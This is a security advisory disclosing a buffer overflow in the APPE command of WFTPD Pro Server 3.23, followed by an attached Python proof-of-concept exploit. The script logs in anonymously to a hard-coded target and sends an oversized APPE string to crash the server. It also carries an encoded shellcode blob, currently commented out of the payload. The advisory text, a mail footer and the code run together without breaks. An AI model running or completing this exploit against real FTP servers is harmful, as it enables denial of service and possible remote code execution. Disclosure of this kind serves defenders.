WFTPD Pro Server 3.23 Buffer Overflow ------------------------------------- A buffer overflow was found in the APPE command when passing (as first) a long string with slashes and/or backslashes. The exploit is clearly exploitable as overwritting EIP is quite easy but I'm too lazy... Attached goes an (unfinished) POC. Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. ------------------------------------------------------------------------ --- Contact ------- Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es ______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y mviles desde 1 cntimo por minuto. http://es.voice.yahoo.com#!/usr/bin/env python import sys import struct import ftplib print "WFTPD Pro Server 3.23.1.1 Buffer Overflow (Only a DOS currently, simple POC)" print "Copyright (c) Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp = ftplib.FTP() print "[+] Connecting to target " msg = ftp.connect(target, targetPort) print "[+] Ok. Target banner" print msg print print "[+] Trying to logging anonymously" msg = ftp.login() # Anonymous print "[+] Ok. Message" print msg print except: print "[!] Exploit doesn't work. " + str(sys.exc_info()[1]) sys.exit(0) a = "\\A:" for i in range(6): a += a print "[+] Padding length " + str(len(a)) + " bytes" b = "ABCD" for i in range(4): b += b a = a + "ABCD"*10 + b shellCode = "" shellCode += "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xec" shellCode += "x9bx26x8cx83xebxfcxe2xf4x10xf1xcdxc1x04x62xd9x73" shellCode += "x13xfbxadxe0xc8xbfxadxc9xd0x10x5ax89x94x9axc9x07" shellCode += "xa3x83xadxd3xccx9axcdxc5x67xafxadx8dx02xaaxe6x15" shellCode += "x40x1fxe6xf8xebx5axecx81xedx59xcdx78xd7xcfx02xa4" shellCode += "x99x7exadxd3xc8x9axcdxeax67x97x6dx07xb3x87x27x67" shellCode += "xefxb7xadx05x80xbfx3axedx2fxaaxfdxe8x67xd8x16x07" shellCode += "xacx97xadxfcxf0x36xadxccxe4xc5x4ex02xa2x95xcaxdc" shellCode += "x13x4dx40xdfx8axf3x15xbex84xecx55xbexb3xcfxd9x5c" shellCode += "x84x50xcbx70xd7xcbxd9x5axb3x12xc3xeax6dx76x2ex8e" shellCode += "xb9xf1x24x73x3cxf3xffx85x19x36x71x73x3axc8x75xdf" shellCode += "xbfxc8x65xdfxafxc8xd9x5cx8axf3x37xd0x8axc8xafx6d" shellCode += "x79xf3x82x96x9cx5cx71x73x3axf1x36xddxb9x64xf6xe4" shellCode += "x48x36x08x65xbbx64xf0xdfxb9x64xf6xe4x09xd2xa0xc5" shellCode += "xbbx64xf0xdcxb8xcfx73x73x3cx08x4ex6bx95x5dx5fxdb" shellCode += "x13x4dx73x73x3cxfdx4cxe8x8axf3x45xe1x65x7ex4cxdc" shellCode += "xb5xb2xeax05x0bxf1x62x05x0exaaxe6x7fx46x65x64xa1" shellCode += "x12xd9x0ax1fx61xe1x1ex27x47x30x4exfex12x28x30x73" shellCode += "x99xdfxd9x5axb7xccx74xddxbdxcax4cx8dxbdxcax73xdd" shellCode += "x13x4bx4ex21x35x9exe8xdfx13x4dx4cx73x13xacxd9x5c" shellCode += "x67xccxdax0fx28xffxd9x5axbex64xf6xe4x1cx11x22xd3" shellCode += "xbfx64xf0x73x3cx9bx26x8c" a = a + "JOXEAN" #+ shellCode print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... " try: msg = ftp.sendcmd("APPE " + a) print "[!] Exploit doesn't work [" + msg + "]" except: print "[+] Exploit apparently works. Trying to verify it ... " try: ftp.connect(target, targetPort) print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :(" except: print "[!] Ok. Server is dead, exploit successfully executed. "